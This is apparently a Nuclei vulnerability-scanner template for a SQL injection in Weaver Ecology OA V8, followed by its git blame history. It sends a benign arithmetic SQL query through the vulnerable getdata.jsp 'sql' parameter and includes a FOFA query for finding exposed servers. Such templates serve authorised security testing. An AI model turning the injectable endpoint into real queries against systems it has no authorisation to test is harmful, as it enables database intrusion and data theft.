nuclei-templates/vulnerabilities/other/ecology-v8-sqli.yaml

id: ecology-v8-sqli

info:
  name: Ecology V8 - SQL Injection
  author: ritikchaddha
  severity: high
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
  metadata:
    fofa-query: app="泛微-协同办公OA"
  tags: ecology,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "474088963122"

      - type: status
        status:
          - 200
Create ecology-v8-sqli.yaml 2022-04-19 20:41:43 +00:00			`id: ecology-v8-sqli`

			`info:`
Update ecology-v8-sqli.yaml 2022-04-19 21:03:52 +00:00			`name: Ecology V8 - SQL Injection`
Create ecology-v8-sqli.yaml 2022-04-19 20:41:43 +00:00			`author: ritikchaddha`
			`severity: high`
			`reference:`
			`- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html`
Update metadata query (#4350) * Update adobe-component-login.yaml * Update cold-fusion-cfcache-map.yaml * Update unpatched-coldfusion.yaml * Update coldfusion-debug-xss.yaml * Update CVE-2020-11978.yaml * Update CVE-2020-13927.yaml * Update CVE-2021-38540.yaml * Update CVE-2021-44451.yaml * Update CVE-2022-24288.yaml * Update airflow-debug.yaml * Update airflow-detect.yaml * Update CVE-2010-0219.yaml * Update apache-axis-detect.yaml * Update CVE-2020-11991.yaml * Update apache-cocoon-detect.yaml * Update CVE-2021-21402.yaml * Update jellyfin-detect.yaml * Update CVE-2021-21402.yaml * Update CVE-2021-21402.yaml * Update ecology-arbitrary-file-upload.yaml * Update ecology-v8-sqli.yaml * Update ecology-syncuserinfo-sqli.yaml * Update ecology-filedownload-directory-traversal.yaml * Update CNVD-2021-15822.yaml * Update dedecms-carbuyaction-fileinclude.yaml * Update dedecms-openredirect.yaml * Update tamronos-rce.yaml * Update natshell-path-traversal.yaml 2022-05-12 14:18:36 +00:00			`metadata:`
			`fofa-query: app="泛微-协同办公OA"`
Create ecology-v8-sqli.yaml 2022-04-19 20:41:43 +00:00			`tags: ecology,sqli`

			`requests:`
			`- method: GET`
			`path:`
Update ecology-v8-sqli.yaml 2022-04-19 21:03:52 +00:00			`- "{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id"`
Create ecology-v8-sqli.yaml 2022-04-19 20:41:43 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
Update ecology-v8-sqli.yaml 2022-04-19 21:03:52 +00:00			`words:`
			`- "474088963122"`
Create ecology-v8-sqli.yaml 2022-04-19 20:41:43 +00:00
			`- type: status`
			`status:`
			`- 200`